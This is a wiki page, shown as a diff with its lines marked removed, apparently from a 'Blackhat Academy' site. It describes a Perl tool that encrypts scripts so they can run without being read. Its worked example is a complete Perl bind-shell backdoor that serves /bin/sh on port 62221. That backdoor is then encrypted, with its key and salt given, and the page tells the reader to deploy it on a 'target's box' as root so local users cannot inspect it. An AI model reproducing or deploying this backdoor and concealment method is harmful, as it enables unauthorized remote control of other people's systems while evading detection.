|
|
| Line 1: |
Line 1: |
| − | {{warning|Neither Blackhat Academy staff or the author are responsible, in any way, for the way in which you use this application pack.}}
| |
| | | | |
| − | ==Description==
| |
| − | Cryptfuscate Suites is a package of applications that allow you to keep your Perl source code from being discovered by local users even while being executed. Cryptfuscate Suites creates and executes encrypted perl modules embedded in a text file. Cryptfuscate uses the Blowfish algorithm with Cipher-block chaining to encrypt cyrptfuscate modules. These modules can in turn be executed by Cryptfuscate Suites' Executer keeping your Perl source code secure. Cryptfuscate Suites is a faster and more time consuming alternative to Perl source code obfuscation. It also is an alternative to fussing with perl2exe.
| |
| − |
| |
| − | ==Modules==
| |
| − | * cryptfuscate.pl - encrypts perl modules embedded in text files to be executed by executer.pl
| |
| − | * executer.pl - executes perl modules embedded in 'cryptfuscated' text files.
| |
| − |
| |
| − | ==Download & Installation==
| |
| − | * '''Download URL''': https://github.com/haqaholiq/Cryptfuscate-Suites/downloads
| |
| − |
| |
| − | Choose to download as tar or zip file, unpackage Cryptfuscate Suites, and start using.
| |
| − |
| |
| − | ==Usage==
| |
| − |
| |
| − | Below is an example of a bind shell module for Cryptfuscate Suites:
| |
| − | {{code|text=<source lang="perl">
| |
| − | use strict;
| |
| − |
| |
| − | print " [*] Setting Up Bind Shell on Port 62221...\n";
| |
| − |
| |
| − | my $system = '/bin/sh';
| |
| − | my $port = 62221;
| |
| − |
| |
| − | use IO::Socket::INET;
| |
| − |
| |
| − | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
| |
| − | or die " [*] Could not setup backdoor...\n";
| |
| − |
| |
| − | setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
| |
| − | or die " [*] Could not setup backdoor...\n";
| |
| − |
| |
| − | bind(SOCK, sockaddr_in($port, INADDR_ANY))
| |
| − | or die " [*] Could not setup backdoor...\n";
| |
| − |
| |
| − | print " [*] Done.\n";
| |
| − |
| |
| − | listen(SOCK, SOMAXCONN)
| |
| − | or die " [*] Could not setup backdoor...\n";
| |
| − |
| |
| − | while(1){
| |
| − | accept(CSOCK, SOCK);
| |
| − |
| |
| − | if(!(my $pid = fork)){
| |
| − |
| |
| − | send(CSOCK, "[*] Connected...\n", 0);
| |
| − |
| |
| − | # Build interactive shell
| |
| − | open(*STDIN, ">&CSOCK");
| |
| − | open(*STDOUT, ">&CSOCK");
| |
| − | open(*STDERR, ">&CSOCK");
| |
| − |
| |
| − | system($system);
| |
| − |
| |
| − | close(*STDIN, *STDOUT, *STDERR);
| |
| − | }
| |
| − | </source>}}
| |
| − | {{info| Save this source code as a text file.}}
| |
| − | We will name this module bd.txt. (This module can be found on github with the rest of the source.)
| |
| − |
| |
| − | Now let's use cryptfuscate.pl to create a encrypted version of bd.txt to use as a payload for executer.pl:
| |
| − | haqaholiq@blackhatacademy$ ./cryptfuscate.pl
| |
| − | Plaintext Module Path: bd.txt
| |
| − | Encrypted Module Path: payload.txt
| |
| − | Encryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d
| |
| − | Salt: 19324953
| |
| − | [*] Text file encrypted successfully...
| |
| − |
| |
| − | Our encrypted version of bd.txt (payload.txt):
| |
| − | {{code|text=<source lang="text">U2FsdGVkX18xOTMyNDk1M8JxfiMccqAr+/FkJf415yyn3xLW3hr1P42zo+eqNB2ec5H+21ve08Cq
| |
| − | i9g01PaB/Y0+dEfZKfhZN1ecPgBk9W27sB+z8GG+zNrVnh6kFRIMWNH67yPp7lohB/u0rvt6UkoQ
| |
| − | QV2c4SoY1KGw5307m8XXqm4NEkRUlVAbU2/u7+u8F/GNA//OX7zJ4ygPacb5dQfGjKxhVRwruVbf
| |
| − | qIxVSNPAK+BjsbKDp/FRL1is3+V48ZRz0vpihXFJyHf7gxuCPMHxDoHMTYefwvRZ1JFhpGANtmj4
| |
| − | +wDvcqDBfk+y6yl0BkeqJTKeoweWeJLf5Vfe4OyUMlngc+pBY1SeYfzdnFEH3VUr/hx8yZ0BQlWR
| |
| − | EtdvJJrT652EOS0zS5whZD8d3cRU8eP9yTOqfhz+L5jeIt/zVfVVx2hcCdNMEE64AQ6mXE4AIDy/
| |
| − | k2igd8KskDq1P/H1HHMpnr3ru+YPg1L+WVU2EhfytHjPehu2CQsunhguzoqE0Sqvoj3sMiDSchfM
| |
| − | +MBul0G4H+5a2Nsq9PE5w0nxXcbu/M/e12aE+n9/GAZnvXO7jmP11/f1GGqhcuQ99bgg70IXXVCY
| |
| − | /P+9ccxTJTNrTFNVj983vYD0orQwrM3BxbmgJPvNU9Vqcfo/voGDt7cWTTNgXMg3hjx9OdL5Hd5K
| |
| − | iSq+/QwtZGCMkhV3dEmxBU2qIE/HEkbnbJEGK/UoYhlLasBI9NAk0CMUHaHs7IcS41jgRSHX6hRR
| |
| − | 9R8b6WIWyO2ByfR7F/rOl0k3wrDhfMfYOrfXdOzVfiexDBUsZ33ZgC+qwIl2XsAoBw++4wBLWOK7
| |
| − | AmxIkk6pmbioXOFDC36Wk0QvRHU7eYQ4O2LSUIfxW90II+Z0u0GW2wP+lg/SxHO8sv2Dyl66HD9P
| |
| − | wcOsRA0xuOztsmoMdpqQFUs+pT6nzezX2/OMZm3BB9Wqm5HdUp0zMq3xx1tbwmRIlUY3NW7Y4LEk
| |
| − | NBtACZ6CSuFiCACDvAW9WAIVSCE1O3B70dN+jJFiFt1zTjugzrGgyU/aAZYEDzJLa9QRkZl/B9t1
| |
| − | jApfMz2gh5VGlXGKQBV6rCK16t8y/SixbvO95syMitHBVG1+sCGSweuKf6Ogfq+DS3DdNzLwKMPW
| |
| − | zWvyCO/q/BlUq0/aEEutep2igD7sBcfS4y+XrrOz+EKXuh8SKKn209URvkg2DjLUxZmnybDg5b/Y
| |
| − | 7CiCfGOvGpA8LGxlGUnVul4ezyJW9wftCsroDvad/Ka/9nJx0Y1npzazsPtkryjVgvlXB6bTVyj8
| |
| − | IlUCkQzGi+LT9xwHZrRBZ/YWerj8C5x3fSu/sC8qCjtIqL7NTVxo</source>}}
| |
| − |
| |
| − | Next pack payload.txt with executer.pl and place on your target's box. Untar and your ready to go execute your module using executer.pl:
| |
| − | root@targetbox$ ./executer.pl
| |
| − | Encrypted Module Path: payload.txt
| |
| − | Decryption Key: ag2k1l90sjf35fd2s10s029bfguqs52d
| |
| − | Salt: 19324953
| |
| − | [*] Executing payload...
| |
| − | [*] Setting Up Bind Shell on Port 62221...
| |
| − | [*] Done.
| |
| − |
| |
| − | We have successfully ran our encrypted bind shell payload on port 62221. The source of our payload is completely encrypted making it impossible for local users to view the source code without knowing the correct encryption key and salt.
| |
